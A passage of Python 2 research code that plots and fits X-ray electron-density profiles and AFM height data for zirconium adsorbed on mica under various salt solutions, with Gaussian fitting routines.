pyplot.xlabel(r"$\rm{Height\ from\ the\ Surface(\AA)}$",fontsize=12,**hfont)
#pyplot.title('Total e profile',fontsize=12)
#ax2=fig.add_subplot(2,1,2)
#pyplot.ylabel("E_density",fontsize=12)
#pyplot.xlabel("Z(Angstrom)",fontsize=12)
#pyplot.title('Zr e profile',fontsize=12)
for i in range(len(dump_files)):
data_eden=pickle.load(open(os.path.join(file_head,dump_files[i]),"rb"))
edata,labels=data_eden[0],data_eden[1]
ax1.plot(np.array(edata[-1][0,:]),edata[-1][1,:]+i*5,color=colors[i],label=label_marks[i],lw=2)
ax1.fill_between(np.array(edata[-1][0,:]),edata[-1][2,:]*0+i*5,edata[-1][2,:]+i*5,color=colors[i],alpha=0.6)
ax1.annotate(label_marks[i],xy=(18,edata[-1][1,:][-1]+i*5-0.5),xytext=(18,edata[-1][1,:][-1]+i*5-0.5),fontsize=10,**hfont)
_cal_percentage_([edata[-1][0,:],edata[-1][2,:]],label=label_marks[i])
#ax1.legend(fontsize=12)
#ax2.legend(fontsize=12)
ax1.set_ylim(0,38)
ax1.set_xlim(-5,50)
ax1.plot([2.5,2.5],[0,40],':',color='black')
ax1.plot([5,5],[0,40],':',color='black')
#ax1.plot([4.3,4.3],[0,12],':',color='black')
for label in ax1.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
for label in ax1.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_eprofiles_genx_results.png'),dpi=300)
return fig
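#The area bookkeeping inside _cal_percentage_ above is a piecewise trapezoid sum; the sketch below is an
#assumed-equivalent reformulation with numpy.trapz (apart from how the single segment straddling the cutoff
#is counted), returning the percentage of the profile area below the cutoff height:
def _area_percentage_sketch(z, e, cutoff=5.0):
    import numpy as np
    z = np.asarray(z, dtype=float)
    e = np.asarray(e, dtype=float)
    mask = z <= cutoff
    return np.trapz(e[mask], z[mask]) / np.trapz(e, z) * 100.0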
dump_file_1=[['total_e_profile_0mM_NaCl','mica_zr_0mM_NaCl_MD_May04_rho'],['total_e_profile_1mM_NaCl','mica_zr_1mM_NaCl_MD_May04_rho'],['total_e_profile_10mM_NaCl','mica_zr_10mM_NaCl_MD_May04_rho'],['total_e_profile_100mM_NaCl','mica_zr_100mM_NaCl_MD_May04_rho']]
label_1=['0 mM NaCl','1 mM NaCl','10 mM NaCl','100 mM NaCl']
dump_file_2=[['total_e_profile_100mM_LiCl','mica_zr_100mM_LiCl_MD_Jun12_rho'],['total_e_profile_100mM_NaCl','mica_zr_100mM_NaCl_MD_May04_rho'],['total_e_profile_100mM_RbCl_Jun29','Zr_mica_zr_100mM_RbCl_MD_Jun29_rho'],['total_e_profile_100mM_RbCl_Jun29','mica_Rb_100mM_RbCl_MD_Jun29_rho'],['total_e_profile_32mM_CaCl2_APS_Jun29','mica_zr_32mM_CaCl2_MD_Jun29_rho_APS'],['total_e_profile_32mM_MgCl2_ESRF','mica_zr_32mM_MgCl2_MD_Jun29_rho_ESRF'],['total_e_profile_100mM_NH4Cl','mica_zr_100mM_NH4Cl_MD_Jun27_rho']]
label_2=['100 mM LiCl (3.4 Zr/AUC)','100 mM NaCl (3.4 Zr/AUC)','100 mM RbCl(3.2 Zr/AUC)','100 mM RbCl(2.4 Rb/AUC)','32 mM CaCl2 (5.1 Zr/AUC)','32 mM MgCl2 (3.7 Zr/AUC)','100 mM NH4Cl (2.4 Zr/AUC)']
dump_file_Jul11=[['total_e_profile_100mM_NH4Cl_Jul11','mica_zr_100mM_NH4Cl_MD_Jul11_rho'],['total_e_profile_100mM_LiCl_Jul11','mica_zr_100mM_LiCl_MD_Jul11_rho'],['total_e_profile_100mM_NaCl_Jul11','mica_zr_100mM_NaCl_MD_Jul11_rho'],['total_e_profile_100mM_KCl_Aug10','mica_zr_100mM_KCl_MD_Aug10_rho'],['total_e_profile_100mM_RbCl_Jun29','Zr_mica_zr_100mM_RbCl_MD_Jun29_rho'],['total_e_profile_100mM_CsCl_Aug10','mica_zr_100mM_CsCl_MD_Aug10_rho'],['total_e_profile_32mM_MgCl2_ESRF_Jul11','mica_zr_32mM_MgCl2_MD_Jul11_rho_ESRF'],['total_e_profile_32mM_CaCl2_APS_Jul11','mica_zr_32mM_CaCl2_MD_Jul11_rho_APS']]
label_Jul11=['100 mM NH4Cl (1.6 Zr/AUC)','100 mM LiCl (2.3 Zr/AUC)','100 mM NaCl (3.4 Zr/AUC)','100 mM KCl (3.3 Zr/AUC)','100 mM RbCl(3.2 Zr/AUC)','100 mM CsCl(3.4 Zr/AUC)','32 mM MgCl2 (3.6 Zr/AUC)','32 mM CaCl2 (5.4 Zr/AUC)',]
def plot_multiple_e_profiles_matlab_output(file_head=module_path_locator(),dump_files=dump_file_Jul11,label_marks=label_Jul11,color_type=1):
colors=set_color(len(dump_files),color_type)
fig=pyplot.figure(figsize=(4,8))
ax1=fig.add_subplot(1,1,1)
hfont = {'fontname':['times new roman','Helvetica'][0]}
pyplot.ylabel(r"$\rm{Normalized\ Electron\ Density}$",fontsize=12,**hfont)
pyplot.xlabel(r"$\rm{Height\ from\ the\ Surface(\AA)}$",fontsize=12,**hfont)
#pyplot.title('Total e profile',fontsize=12)
#ax2=fig.add_subplot(2,1,2)
#pyplot.ylabel("E_density",fontsize=12)
#pyplot.xlabel("Z(Angstrom)",fontsize=12)
#pyplot.title('Zr e profile',fontsize=12)
for i in range(len(dump_files)):
edata=np.loadtxt(os.path.join(file_head,dump_files[i][0]))
ra_data=np.loadtxt(os.path.join(file_head,dump_files[i][1]))
#labels=data_eden[0],data_eden[1]
ax1.plot(np.array(edata[:,0]),edata[:,1]+i*5,color=colors[i],label=label_marks[i],lw=2)
ax1.fill_between(ra_data[:,0],np.array([0]*len(ra_data))+i*5,ra_data[:,1]+i*5,color=colors[i],alpha=0.6)
ax1.annotate(label_marks[i],xy=(17,edata[:,1][-1]+i*5+1.5),xytext=(16,edata[:,1][-1]+i*5+1.5),fontsize=10,**hfont)
#ax1.legend(fontsize=10)
#ax2.legend(fontsize=12)
ax1.set_ylim(0,47)
ax1.set_xlim(-5,50)
ax1.plot([2.5,2.5],[0,42],':',color='black')
for label in ax1.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
for label in ax1.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
#ax1.plot([4.3,4.3],[0,20],':',color='black')
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_eprofiles3.png'),dpi=300)
return fig
files_AFM=['P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 0mM NaCl\\processed images\\height_dist_data',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 1mM NaCl\\processed ones\\height_dist_data',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 10mM NaCl\\processed ones\\height_dist_data',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 100mM NaCl\\processed ones\\height_dist_data']
def plot_AFM_height_distribution(files=files_AFM,labels=['0 mM NaCl','1 mM NaCl', '10 mM NaCl', '100 mM NaCl'],zero_height_offset=2.8,color_type=1):
colors=set_color(len(files),color_type)
fig=pyplot.figure(figsize=(5,2))
ax1=fig.add_subplot(1,1,1)
hfont = {'fontname':['times new roman','Helvetica'][0]}
pyplot.ylabel(r"$\rm{Distribution}$",fontsize=10,**hfont)
pyplot.xlabel(r"$\rm{Height (\AA)}$",fontsize=10,**hfont)
for i in range(len(files)):
data1=np.loadtxt(files[i],skiprows=3)
if i!=2:
data1[:,0]=data1[:,0]*1e10-zero_height_offset
else:
data1[:,0]=data1[:,0]*1e10
        data1[:,1]=data1[:,1]/np.max(data1[:,1])
ax1.plot(data1[:,0],data1[:,1],color=colors[i],label=labels[i])
for label in ax1.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(10)
for label in ax1.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(10)
l=pyplot.legend(fontsize=10)
pyplot.setp(l.texts,family='times new roman')
fig.tight_layout()
fig.savefig(os.path.join(module_path_locator(),'AFM_height_distribution.png'),dpi=300)
return fig
files_AFM=['P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 0mM NaCl\\processed images\\facet_profile',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 1mM NaCl\\processed ones\\waviness_profile',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 10mM NaCl\\processed ones\\facet_profile',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 100mM NaCl\\processed ones\\facet_profile']
def plot_AFM_facet_profiles(files=files_AFM,labels=[r"$\rm{0\ mM\ NaCl\ (Avg=5.4 \pm 0.5\ nm)}$",r"$\rm{1\ mM\ NaCl\ (Avg=5.1 \pm 0.1\ nm)}$", r"$\rm{10\ mM\ NaCl\ (Avg=7.3 \pm 0.6\ nm)}$", r"$\rm{100\ mM\ NaCl\ (Avg=8.6 \pm 0.5\ nm)}$"],color_type=1):
colors=set_color(len(files),color_type)
fig=pyplot.figure(figsize=(5,8))
hfont = {'fontname':['times new roman','Helvetica'][0]}
for i in range(len(files)):
ax1=fig.add_subplot(4,1,4-i)
data1=np.loadtxt(files[i],skiprows=3)
data1[:,0]=data1[:,0]*1e9
data1[:,1]=data1[:,1]*1e9
ax1.plot(data1[:,0],data1[:,1],color=colors[i])
l=pyplot.title(labels[i],fontsize=12)
#pyplot.setp(l.texts,family='times new roman')
pyplot.ylabel(r"$\rm{Height (nm)}$",fontsize=12,**hfont)
if i==0:
pyplot.xlabel(r"$\rm{Length (nm)}$",fontsize=12,**hfont)
fig.tight_layout()
fig.savefig(os.path.join(module_path_locator(),'AFM_facet_profiles.png'),dpi=300)
return fig
def plot_multiple_APQ_profiles(file_head=module_path_locator(),dump_files=['temp_plot_raxr_A_P_Q_0NaCl','temp_plot_raxr_A_P_Q_1NaCl','temp_plot_raxr_A_P_Q_10NaCl','temp_plot_raxr_A_P_Q_100NaCl'],labels=['free of NaCl','1 mM NaCl','10 mM NaCl','100 mM NaCl'],color_type=5):
colors=set_color(len(dump_files),color_type)
fig1=pyplot.figure(figsize=(8,4))
ax1=fig1.add_subplot(1,2,1)
pyplot.ylabel(r'$\rm{Partial\ SF\ Amplitude\ (Zr/A_{UC})}$')
pyplot.xlabel(r'$\rm{q\ (\AA^{-1})}$')
ax2=fig1.add_subplot(1,2,2)
pyplot.ylabel(r'$\rm{Partial\ SF\ Phase/q\ (\AA)}$')
pyplot.xlabel(r'$\rm{q\ (\AA^{-1})}$')
for i in range(len(dump_files)):
AP_Q_file=os.path.join(file_head,dump_files[i])
        #plot Q dependence of Fourier components A and P
data_AP_Q=pickle.load(open(AP_Q_file,"rb"))
#A over Q
ax1.plot(data_AP_Q[0][2],data_AP_Q[0][0],color=colors[i],label=labels[i],lw=1.5)
ax1.errorbar(data_AP_Q[1][2],data_AP_Q[1][0],yerr=np.transpose(data_AP_Q[1][3]),color=colors[i],fmt='o',markersize=4.5)
#P over Q
ax2.plot(data_AP_Q[0][2],np.array(data_AP_Q[0][1])/np.array(data_AP_Q[0][2])*np.pi*2,color=colors[i],label=labels[i],lw=1.5)
ax2.errorbar(data_AP_Q[1][2],np.array(data_AP_Q[1][1])/np.array(data_AP_Q[1][2])*np.pi*2,yerr=np.transpose(data_AP_Q[1][4])*np.pi*2/[data_AP_Q[1][2],data_AP_Q[1][2]],color=colors[i],fmt='o',markersize=4.5)
ax2.legend(frameon=False,fontsize=12)
ax1.legend(frameon=False,fontsize=12)
ax1.set_xlim(0,4)
ax2.set_xlim(0,4)
fig1.tight_layout()
fig1.savefig(os.path.join(file_head,'multiple_APQ_profiles.png'),dpi=300)
return fig1
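#Note on the phase axis of plot_multiple_APQ_profiles: the dumped phase P is stored as a fraction of 2*pi,
#so P/q*2*pi carries units of length, which is what the 'Partial SF Phase/q (A)' axis above plots; a
#one-line sketch of that conversion (names are illustrative):
def _phase_to_height_sketch(P, q):
    import numpy as np
    return np.asarray(P, dtype=float) / np.asarray(q, dtype=float) * 2.0 * np.pi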
def plot_AFM_profiles(file_head='P:\\My stuff\\Manuscripts\\zr on mica\\AFM images',profile_files=['AFM profile for 0mM NaCl.csv','AFM profile for 1mM NaCl.csv','AFM profile for 10mM NaCl.csv','AFM profile for 100mM NaCl.csv'],labels=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],color_type=5):
colors=set_color(len(profile_files),color_type)
fig=pyplot.figure(figsize=(6,6))
for i in range(len(profile_files)):
data=np.loadtxt(os.path.join(file_head,profile_files[i]),delimiter=',')
ax=fig.add_subplot(2,2,i+1)
ax.plot(data[:,1],data[:,0])
pyplot.title(labels[i],fontsize=10)
pyplot.xlabel("length (nm)")
pyplot.ylabel("height (nm)")
fig.tight_layout()
fig.savefig(os.path.join(file_head,'AFM_profiles.png'),dpi=300)
return fig
def cal_e_density(z_list,oc_list,u_list,z_min=0,z_max=29,resolution=1000,N=40,wt=0.25,Auc=46.927488088,water_scaling=1):
height_list=[]
e_list=[]
z_min=float(z_min)
z_max=float(z_max)
def _density_at_z(z,z_cen,oc,u):
return wt*N*oc*(2*np.pi*u**2)**-0.5*np.exp(-0.5/u**2*(z-z_cen)**2)/Auc
for i in range(resolution):
z_each=z_min+(z_max-z_min)/resolution*i
e_temp=0
for j in range(len(z_list)):
z_cen=z_list[j]
oc=oc_list[j]
u=u_list[j]
e_temp+=_density_at_z(z_each,z_cen,oc,u)
height_list.append(z_each)
e_list.append(e_temp/water_scaling)
pickle.dump([height_list,e_list],open(os.path.join(module_path_locator(),"temp_plot_RAXR_eden_e_fit"),"wb"))
pyplot.figure()
pyplot.plot(height_list,e_list)
return e_list
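#Each term summed in cal_e_density is a 1-D Gaussian of width u centred at z_cen, carrying wt*N*oc electrons
#spread over the unit-cell area Auc; a tiny numerical sketch (illustrative parameter values) checking that
#integrating one such term over z recovers wt*N*oc/Auc, i.e. that the Gaussian profile is area-normalised:
def _check_gaussian_normalisation_sketch(N=40, oc=1.0, u=0.5, wt=0.25, Auc=46.927488088):
    import numpy as np
    z = np.linspace(-10.0, 10.0, 20001)
    rho = wt * N * oc * (2 * np.pi * u**2)**-0.5 * np.exp(-0.5 / u**2 * z**2) / Auc
    return np.trapz(rho, z), wt * N * oc / Auc  # the two returned numbers should agree closely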
def fit_e_2(zs=None,water_scaling=1,fit_range=[1,40]):
total_eden=pickle.load(open(os.path.join(module_path_locator(),"temp_plot_eden"),"rb"))[0][-1]
raxr_eden=pickle.load(open(os.path.join(module_path_locator(),"temp_plot_RAXR_eden_e_fit"),"rb"))
pyplot.figure()
pyplot.plot(raxr_eden[0],raxr_eden[1])
fit_data=np.append(np.array(raxr_eden[0])[:,np.newaxis],(np.array(total_eden[1,:])-np.array(raxr_eden[1]))[:,np.newaxis],axis=1)
pyplot.figure()
print '##############Total e - raxr - water#################'
gaussian_fit(fit_data,fit_range=fit_range,zs=zs,water_scaling=water_scaling)
pyplot.title('Total e - raxr -water')
return None
def overplot_total_raxr_e_density():
total_eden=pickle.load(open(os.path.join(module_path_locator(),"temp_plot_eden"),"rb"))[0][-1]
raxr_eden=pickle.load(open(os.path.join(module_path_locator(),"temp_plot_RAXR_eden_e_fit"),"rb"))
pyplot.figure()
pyplot.plot(raxr_eden[0],raxr_eden[1],label='RAXR el e density')
pyplot.plot(total_eden[0,:],total_eden[1,:],label='Total e density')
pyplot.legend()
return None
def overplot_raxr_e_density(dump_files=["temp_plot_RAXR_eden_e_fit_0mMNaCl","temp_plot_RAXR_eden_e_fit_1mMNaCl","temp_plot_RAXR_eden_e_fit_10mMNaCl","temp_plot_RAXR_eden_e_fit_100mMNaCl"],labels=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl']):
fig=pyplot.figure()
colors=set_color(len(dump_files),1)
for i in range(len(dump_files)):
dump_file=dump_files[i]
label=labels[i]
raxr_eden=pickle.load(open(os.path.join(module_path_locator(),dump_file),"rb"))
pyplot.fill_between(raxr_eden[0],np.array(raxr_eden[1])+i,i,color=colors[i],label=label)
pyplot.legend()
#fig.savefig(os.path.join(os.path.join(module_path_locator(),'temp_raxr_e_profiles_overlapping_profile.png'),dpi=300))
return fig
def plot_all(path=module_path_locator(),make_offset_of_total_e=False,fit_e_profile=0):
    #Set make_offset_of_total_e to True if you want the total e density represented by total_e - resonant_e, for the case where the resonant elements are frozen so that they have no influence on the CTR.
    #In that case, the quantity labelled total_e - raxs_e - water is actually total_e - 2*raxs_e - water.
PATH=path
#which plots do you want to create
plot_e_model,plot_e_FS,plot_ctr,plot_raxr,plot_AP_Q=1,1,0,0,0
#specify file paths (files are dumped files when setting running_mode=False in GenX script)
e_file=os.path.join(PATH,"temp_plot_eden")#e density from model
e_file_FS=os.path.join(PATH,"temp_plot_eden_fourier_synthesis") #e density from Fourier synthesis
water_scaling_file=os.path.join(PATH,"water_scaling")
ctr_file_folder=PATH
    ctr_file_names=["temp_plot"]#you may want to overplot different ctr profiles based on different models
raxr_file=os.path.join(PATH,"temp_plot_raxr")
AP_Q_file=os.path.join(PATH,"temp_plot_raxr_A_P_Q")
e_den_subtracted=None
e_den_raxr_MI=None
water_scaling=None
#plot electron density profile
if plot_e_model:
data_eden=pickle.load(open(e_file,"rb"))
edata,labels=data_eden[0],data_eden[1]
water_scaling=pickle.load(open(water_scaling_file,"rb"))[-1]#total water scaling factor to be used in Gaussian fit below
N=len(labels)
fig=pyplot.figure(figsize=(15,6))
if plot_e_FS:
data_eden_FS=pickle.load(open(e_file_FS,"rb"))
data_eden_FS_sub=pickle.load(open(e_file_FS+"_sub","rb"))
for i in range(N):
if i==N-1:
ax=fig.add_subplot(1,2,2)
else:
#ax=fig.add_subplot(N/2+1,2,i*2+1)
ax=fig.add_subplot(N-1,2,i*2+1)
if make_offset_of_total_e:
try:
edata[i][1,:]=list(np.array(edata[i][1,:])-np.array(edata[i][2,:]))
except:
pass
else:
pass
ax.plot(np.array(edata[i][0,:]),edata[i][1,:],color='black',lw=2.5,linestyle='-',label="Total e density")
ax.plot([0,0],[0,max(edata[i][1,:])+2],linestyle=':',color='m',lw=3,label='Mineral surface')
#ax.plot(np.array(edata[i][0,:]),edata[i][2,:],color='blue')
ax.fill_between(np.array(edata[i][0,:]),edata[i][2,:],alpha=0.2,color='m',label="RAXS element e profile (MD)")
#try:#some domain may have no raxr element
# ax.plot(np.array(edata[i][0,:]),edata[i][2,:],color='g',label="RAXS element e profile (MD)")
#except:
# pass
pyplot.title(labels[i],fontsize=11)
if plot_e_FS:
#if i==0:
if i!=N-1:
ax.plot(data_eden_FS[0],list(np.array(data_eden_FS[2])[:,i]),color='r',label="RAXR imaging (MI)")
#ax.fill_between(data_eden_FS[0],list(np.array(data_eden_FS[2])[:,i]),color='m',alpha=0.6)
#clip off negative part of the e density from the Fourier synthesis
#ax.fill_between(data_eden_FS[0],list(edata[i][1,:]-edata[i][3,:]-np.array(data_eden_FS[2])[:,i]*(np.array(data_eden_FS[2])[:,i]>0.01)),color='black',alpha=0.6,label="Total e - LayerWater - RAXR")
ax.fill_between(data_eden_FS[0],edata[i][3,:],color='green',alpha=0.4,label="LayerWater")
ax.plot(data_eden_FS_sub[0],list(np.array(data_eden_FS_sub[2])[:,i]),color='blue',label="RAXR imaging (MD)")
#ax.fill_between(data_eden_FS_sub[0],list(np.array(data_eden_FS_sub[2])[:,i]),color='c',alpha=0.6)
elif i==N-1:
ax.plot(data_eden_FS[0],data_eden_FS[1],color='r',label="RAXR imaging (MI)")
#ax.fill_between(data_eden_FS[0],data_eden_FS[1],color='m',alpha=0.6)
#ax.fill_between(data_eden_FS[0],edata[i][1,:]-data_eden_FS[1],color='black',alpha=0.6,label="Total e - RAXR(MI)")
ax.fill_between(data_eden_FS[0],edata[i][3,:],color='green',alpha=0.4,label="LayerWater")
'''
if make_offset_of_total_e:
ax.fill_between(data_eden_FS[0],list(edata[i][1,:]-edata[i][3,:]-2*edata[i][2,:]),color='black',alpha=0.6,label="Total e - raxr (MD) - LayerWater")
else:
ax.fill_between(data_eden_FS[0],list(edata[i][1,:]-edata[i][3,:]-edata[i][2,:]),color='black',alpha=0.6,label="Total e - raxr (MD) - LayerWater")
#ax.fill_between(data_eden_FS[0],list(edata[i][1,:]-edata[i][3,:]-np.array(data_eden_FS[1])*(np.array(data_eden_FS[1])>0.01)),color='black',alpha=0.6,label="Total e - LayerWater - RAXR")
#eden_temp=list(edata[i][1,:]-edata[i][3,:]-np.array(data_eden_FS[1])*(np.array(data_eden_FS[1])>0.01))
'''
eden_temp=None
if make_offset_of_total_e:
eden_temp=list(edata[i][1,:]-edata[i][3,:]-2*edata[i][2,:]*0)
else:
eden_temp=list(edata[i][1,:]-edata[i][3,:]-edata[i][2,:]*0)
eden_temp=(np.array(eden_temp)*(np.array(eden_temp)>0.01))[:,np.newaxis]
z_temp=np.array(data_eden_FS[0])[:,np.newaxis]
e_den_subtracted=np.append(z_temp,eden_temp,axis=1)
e_den_raxr_MI=np.append(np.array(data_eden_FS[0])[:,np.newaxis],(np.array(data_eden_FS[1])*(np.array(data_eden_FS[1])>0.01))[:,np.newaxis],axis=1)
ax.plot(data_eden_FS_sub[0],data_eden_FS_sub[1],color='blue',label="RAXR imaging (MD)")
#ax.fill_between(data_eden_FS_sub[0],data_eden_FS_sub[1],color='m',alpha=0.6)
if i==N-1:pyplot.xlabel('Z(Angstrom)',axes=ax,fontsize=12)
pyplot.ylabel('E_density',axes=ax,fontsize=12)
pyplot.ylim(ymin=0)
pyplot.xlim(xmin=-15)
pyplot.xlim(xmax=15)
if i==N-1:pyplot.legend(fontsize=11,ncol=1)
fig.tight_layout()
fig.savefig(e_file+".png",dpi=300)
if plot_ctr:
#plot ctr profiles
#plotting_single_rod(save_file=ctr_file_folder+"temp_plot_ctr.png",head=ctr_file_folder,object_files=ctr_file_names,color=['w','r'],l_dashes=[(None,None)],lw=2,rod_index=0)
plotting_many_modelB(save_file=os.path.join(ctr_file_folder,"temp_plot_ctr.png"),head=ctr_file_folder,object_files=ctr_file_names,color=['b','r'],l_dashes=[(None,None)],lw=2)
plt.show(block=False)
if plot_raxr:
#plot raxr profiles
data_raxr=pickle.load(open(raxr_file,"rb"))
plotting_raxr_new(data_raxr,savefile=raxr_file+".png",color=['b','r'],marker=['o'])
plt.show(block=False)
if plot_AP_Q:
#plot Q dependence of Foriour components A and P
colors=['black','r','blue','green','yellow']
labels=['Domain1','Domain2','Domain3','Domain4']
data_AP_Q=pickle.load(open(AP_Q_file,"rb"))
fig1=pyplot.figure(figsize=(9,9))
ax1=fig1.add_subplot(2,1,1)
#A over Q
ax1.plot(data_AP_Q[0][2],data_AP_Q[0][0],color='r')
ax1.errorbar(data_AP_Q[1][2],data_AP_Q[1][0],yerr=np.transpose(data_AP_Q[1][3]),color='g',fmt='o')
pyplot.ylabel("A",axes=ax1)
pyplot.xlabel("Q",axes=ax1)
pyplot.legend()
#P over Q
ax2=fig1.add_subplot(2,1,2)
ax2.plot(data_AP_Q[0][2],np.array(data_AP_Q[0][1])/np.array(data_AP_Q[0][2])*np.pi*2,color='r')
ax2.errorbar(data_AP_Q[1][2],np.array(data_AP_Q[1][1])/np.array(data_AP_Q[1][2])*np.pi*2,yerr=np.transpose(data_AP_Q[1][4])*np.pi*2/[data_AP_Q[1][2],data_AP_Q[1][2]],color='g',fmt='o')
pyplot.ylabel("P/Q(2pi)",axes=ax2)
pyplot.xlabel("Q",axes=ax2)
pyplot.legend()
fig1.savefig(os.path.join(PATH,'temp_APQ_profile.png'),dpi=300)
#now plot the subtracted e density and print out the gaussian fit results
if fit_e_profile:
pyplot.figure()
print '##############Total e -layer water#################'
#gaussian_fit(e_den_subtracted,zs=None,water_scaling=water_scaling)
gaussian_fit_DE(e_den_subtracted,zs=3,water_scaling=water_scaling)
pyplot.title('Total e - layer water')
pyplot.figure()
print '#########################RAXR (MI)########################'
gaussian_fit(e_den_raxr_MI,zs=None,N=40,water_scaling=water_scaling)
pyplot.title('RAXR (MI)')
pyplot.figure()
'''
print '#########################RAXR (MD)########################'
gaussian_fit(np.append([data_eden_FS_sub[0]],[data_eden_FS_sub[1]*(np.array(data_eden_FS_sub[1])>0)],axis=0).transpose(),zs=None,N=40,water_scaling=water_scaling)
pyplot.title('RAXR (MD)')
pyplot.show()
#return e_den_subtracted,data_eden_FS
'''
return water_scaling
def gaussian_fit_DE(data,fit_range=[1,40],zs=None,N=8,water_scaling=1):
x,y=[],[]
for i in range(len(data)):
if data[i,0]>fit_range[0] and data[i,0]<fit_range[1]:
x.append(data[i,0]),y.append(data[i,1])
x,y=np.array(x),np.array(y)*water_scaling
plt.plot(x,y)
plt.show()
def func_DE(params,*args):
x=np.array(list(args))
y_fit = np.zeros_like(x)
for i in range(0, len(params), 3):
amp = abs(params[i])
wid = abs(params[i+1])
ctr= abs(params[i+2])
y_fit = y_fit + amp * np.exp( -((x - ctr)/wid)**2/2)
return sum(abs(y_fit-y))
def func(params,*args):
x=np.array(list(args))
y_fit = np.zeros_like(x)
for i in range(0, len(params), 3):
amp = abs(params[i])
wid = abs(params[i+1])
ctr= abs(params[i+2])
y_fit = y_fit + amp * np.exp( -((x - ctr)/wid)**2/2)
return y_fit
ctrs=[]
bounds=[]
if zs==None:
for i in range(1,len(x)-1):
if y[i-1]<y[i] and y[i+1]<y[i]:
ctrs.append(x[i])
elif type(zs)==int:
ctrs=[fit_range[0]+(fit_range[1]-fit_range[0])/zs*i for i in range(zs)]+[fit_range[1]]
else:
ctrs=np.array(zs)
for i in range(len(ctrs)):
#bounds+=[(0,30),(0.2,10),(np.max([ctrs[i]-5,fit_range[0]]),np.min([ctrs[i]+5,fit_range[1]]))]
bounds+=[(0,30),(0.2,10),(fit_range[0],fit_range[1])]
result=differential_evolution(func_DE, bounds,args=tuple(x))
popt=result.x
print popt
combinded_set=[]
#print 'z occupancy*4 U(sigma**2)'
for i in range(0,len(popt),3):
combinded_set=combinded_set+[abs(popt[i])/N*(abs(popt[i])*np.sqrt(np.pi*2)*5.199*9.027)*4,abs(popt[i+1])**2,popt[i+2]]
#print '%3.3f\t%3.3f\t%3.3f'%(ctrs[i/2],abs(popt[i])/N*(abs(popt[i+1])*np.sqrt(np.pi*2)*5.199*9.027)*4,abs(popt[i+1])**2)
combinded_set=np.reshape(np.array(combinded_set),(len(combinded_set)/3,3)).transpose()
print combinded_set
#combinded_set=combinded_set.transpose()
#normalized to full surface unit cell
print 'total_occupancy=',np.sum(combinded_set[0,:]/4)
#normalized to half unit cell (oc and u have been added to 1 to be used in Matlab input par file)
print 'OC_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[0,:]]),'])'
#the u not U(u**2)
print 'U_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[1,:]]),'])'
print 'X_RAXS_LIST=[0.5]*',len(combinded_set[1,:])
print 'Y_RAXS_LIST=[0.5]*',len(combinded_set[1,:])
print 'Z_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[2,:]]),'])'
fit = func(popt,*x)
plt.plot(x, y)
plt.plot(x, fit , 'r-')
plt.show()
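#Note on the parameter packing used above (illustrative values, not from a real fit):
#the flat params vector holds three entries per Gaussian, [amp, wid, ctr, amp, wid, ctr, ...],
#so params=[1.0, 0.5, 3.0] describes a single peak of amplitude 1, sigma 0.5 A centred at z=3 A;
#func rebuilds the profile as sum_i amp_i*exp(-((x-ctr_i)/wid_i)**2/2) and func_DE returns the
#summed absolute residual of that profile against y.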
def gaussian_fit(data,fit_range=[1,40],zs=None,N=8,water_scaling=1):
x,y=[],[]
for i in range(len(data)):
if data[i,0]>fit_range[0] and data[i,0]<fit_range[1]:
x.append(data[i,0]),y.append(data[i,1])
x,y=np.array(x),np.array(y)*water_scaling
plt.plot(x,y)
plt.show()
def func(x_ctrs,*params):
y = np.zeros_like(x_ctrs[0])
x=x_ctrs[0]
ctrs=x_ctrs[1]
for i in range(0, len(params), 2):
amp = abs(params[i])
wid = abs(params[i+1])
ctr=ctrs[int(i/2)]
y = y + amp * np.exp( -((x - ctr)/wid)**2/2)
return y
guess = []
ctrs=[]
if zs==None:
for i in range(1,len(x)-1):
if y[i-1]<y[i] and y[i+1]<y[i]:
ctrs.append(x[i])
elif type(zs)==int:
ctrs=[fit_range[0]+(fit_range[1]-fit_range[0])/zs*i for i in range(zs)]+[fit_range[1]]
else:
ctrs=np.array(zs)
for i in range(len(ctrs)):
guess += [0.5, 1]
popt, pcov = curve_fit(func, [x,ctrs], y, p0=guess)
combinded_set=[]
#print 'z occupancy*4 U(sigma**2)'
for i in range(0,len(popt),2):
combinded_set=combinded_set+[ctrs[i/2],abs(popt[i])/N*(abs(popt[i+1])*np.sqrt(np.pi*2)*5.199*9.027)*4,abs(popt[i+1])**2]
#print '%3.3f\t%3.3f\t%3.3f'%(ctrs[i/2],abs(popt[i])/N*(abs(popt[i+1])*np.sqrt(np.pi*2)*5.199*9.027)*4,abs(popt[i+1])**2)
combinded_set=np.reshape(np.array(combinded_set),(len(combinded_set)/3,3)).transpose()
#combinded_set=combinded_set.transpose()
#normalized to full surface unit cell
#inputs for GenX refinement
print 'total_occupancy=',np.sum(combinded_set[1,:]/4)
print 'OC_LIST=np.array([',','.join([str(each) for each in combinded_set[1,:]]),'])'
print 'U_LIST=np.array([',','.join([str(each) for each in combinded_set[2,:]]),'])'
print 'X_LIST=[0.5]*',len(combinded_set[1,:])
print 'Y_LIST=[0.5]*',len(combinded_set[1,:])
print 'Z_LIST=np.array([',','.join([str(each) for each in combinded_set[0,:]]),'])'
